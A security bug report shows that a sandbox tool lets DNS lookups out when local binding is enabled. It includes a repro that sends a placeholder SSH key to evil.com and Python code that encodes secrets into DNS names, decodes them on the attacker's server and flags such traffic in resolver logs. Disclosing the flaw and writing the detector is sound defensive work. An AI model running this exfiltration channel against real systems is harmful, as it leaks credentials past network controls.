Data exfiltration via DNS resolution when allowLocalBinding: true


settings.json

{
  "network": {
    "allowedDomains": [],
    "deniedDomains": [],
    "allowLocalBinding": true
  },
  "filesystem": {
    "denyRead": [],
    "allowWrite": [],
    "denyWrite": []
  }
}

command

srt --settings settings.json 'dig your-ssh-key.a.evil.com'

EXPECTED

  • evil.com is not on the allowed domains list, so the DNS query for your-ssh-key.a.evil.com should be blocked
  • Enabling local port binding should not permit outbound network requests from inside the sandbox

ACTUAL

  • Data exfiltration: the owner of evil.com can publish an NS record delegating a.evil.com to a name server they control. Every recursive resolver (Google, Cloudflare, the router at 192.168.0.1 in the dig output below, any other) then forwards the A query for your-ssh-key.a.evil.com to that attacker-owned server, which sees the full name. Whatever the sandboxed process puts in the leftmost labels (here the placeholder your-ssh-key) leaves the sandbox; no answer has to come back for the leak to succeed.
  • Any sandbox with local port binding enabled is therefore exposed to data exfiltration over DNS, regardless of allowedDomains.

output
; <<>> DiG 9.10.6 <<>> your-ssh-key.a.evil.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;your-ssh-key.a.evil.com.	IN	A

;; ANSWER SECTION:
your-ssh-key.a.evil.com. 3600	IN	A	66.96.146.129

;; Query time: 48 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Mon Jan 12 17:29:41 EST 2026
;; MSG SIZE  rcvd: 68
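The mechanism described under ACTUAL (data packed into the leftmost labels of a name under a delegated zone, read off by the attacker's authoritative server) and the check a defender would run against resolver query logs, both as an added example that is not part of the original report or of srt. The zone a.evil.com, the log line format, the secret bytes and the detection thresholds are assumptions made for the example.

```python
import base64
import math
import re
from collections import defaultdict

# Hypothetical delegated zone, as in the report: the attacker publishes an NS
# record for a.evil.com pointing at a name server they run and log.
ZONE = "a.evil.com"
LABEL_CHARS = 60   # stay under the 63-octet DNS label limit (RFC 1035)


def encode_secret(secret: bytes, zone: str = ZONE) -> list[str]:
    """Exfil side: split the secret into query names <seq>.<base32 chunk>.<zone>.
    Base32 survives case-folding by resolvers; '=' padding is dropped here and
    restored by decode_queries. The sequence label lets the receiver reorder
    queries that arrive out of order."""
    b32 = base64.b32encode(secret).decode("ascii").rstrip("=").lower()
    chunks = [b32[i:i + LABEL_CHARS] for i in range(0, len(b32), LABEL_CHARS)]
    names = [f"{seq}.{chunk}.{zone}" for seq, chunk in enumerate(chunks)]
    for name in names:  # sanity check: labels <= 63 octets, whole name <= 253
        assert len(name) <= 253 and all(len(l) <= 63 for l in name.split("."))
    return names


def decode_queries(names, zone: str = ZONE) -> bytes:
    """Attacker's authoritative server: reassemble the secret from the names it
    was asked about, ignoring anything outside its zone."""
    suffix = "." + zone
    parts = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        seq, chunk = name[:-len(suffix)].split(".", 1)
        parts[int(seq)] = chunk
    b32 = "".join(parts[i] for i in sorted(parts)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


# Detection side: scan resolver query logs for names that look like a channel.
# The log format is constructed for this example, not any real resolver's.
LOG_RE = re.compile(r"client=(\S+)\s+query=(\S+)\s+type=(\S+)")


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registered_zone(name: str, depth: int = 3) -> str:
    """Crude grouping key: the last `depth` labels (a.evil.com). A production
    detector would use the public-suffix list instead."""
    return ".".join(name.split(".")[-depth:])


def flag_exfil(log_lines, min_unique=5, min_label=32, min_entropy=3.5):
    """Return {zone: reason} for zones that receive many distinct query names
    carrying long, high-entropy labels, the signature of encoded data."""
    by_zone = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            qname = m.group(2).lower().rstrip(".")
            by_zone[registered_zone(qname)].add(qname)
    flagged = {}
    for zone, names in by_zone.items():
        labels = [l for n in names for l in n[:-len(zone) - 1].split(".") if l]
        if not labels:
            continue
        longest = max(labels, key=len)
        ent = shannon_entropy(longest)
        if len(names) >= min_unique and len(longest) >= min_label and ent >= min_entropy:
            flagged[zone] = (f"{len(names)} distinct names, longest label "
                             f"{len(longest)} chars, entropy {ent:.2f} bits/char")
    return flagged


# Constructed inputs: 200 bytes of deterministic filler standing in for the
# SSH key, chosen so the resulting base32 labels are easy to eyeball.
SECRET = base64.b32decode("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" * 10)
LOG_LINES = [
    "2026-01-12T17:29:40 client=10.0.0.5 query=www.example.com type=A",
    "2026-01-12T17:29:40 client=10.0.0.5 query=api.example.com type=A",
] + [f"2026-01-12T17:29:41 client=10.0.0.5 query={n} type=A"
     for n in encode_secret(SECRET)]

if __name__ == "__main__":
    names = encode_secret(SECRET)
    print(names[0])
    print(decode_queries(reversed(names)) == SECRET)
    print(flag_exfil(LOG_LINES))
```

The same channel works with TXT, CNAME or NULL lookups, not only A, so a detector keyed on record type alone misses it; the thresholds above need tuning against the normal query volume of the resolver being watched.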